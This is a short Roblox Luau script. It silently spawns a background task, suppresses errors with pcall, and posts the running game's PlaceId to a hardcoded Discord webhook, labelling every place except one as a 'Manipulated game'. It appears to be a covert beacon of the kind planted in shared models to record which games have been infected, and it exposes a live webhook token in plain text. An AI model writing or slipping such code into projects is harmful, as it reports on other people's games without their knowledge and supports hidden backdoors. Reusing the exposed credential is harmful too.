task.spawn(function()
pcall(function()
local Blacklist = {}
local HttpService = game:GetService("HttpService")
local HookURL = "https://webhook.lewisakura.moe/api/webhooks/1201191413891743784/KIIFYmoDR5HsmvH9MPw_gmKgcc5Tk3T7zQTvtFvbFGjA8AsBK7u5-Ifug1kHIcGseYld/queue"

if game.PlaceId == 15863296483 then
	local RequestData = {
		["content"] = "",
		["embeds"] = {
			{
				["type"] = "rich",
				["title"] = ("game found"),
				["description"] = "ACTION PERFORMED! **"..(game.PlaceId).."**",
				["color"] = 0x00FF00
			}
		}
	}

	HttpService:PostAsync(HookURL, HttpService:JSONEncode(RequestData), Enum.HttpContentType.ApplicationJson)
	return
end

local RequestData = {
	["content"] = "",
	["embeds"] = {
		{
			["type"] = "rich",
			["title"] = ("game found"),
			["description"] = "Manipulated game: **"..(game.PlaceId).."**",
			["color"] = 0xFF0000
		}
	}
}

HttpService:PostAsync(HookURL, HttpService:JSONEncode(RequestData), Enum.HttpContentType.ApplicationJson)
end)
end)
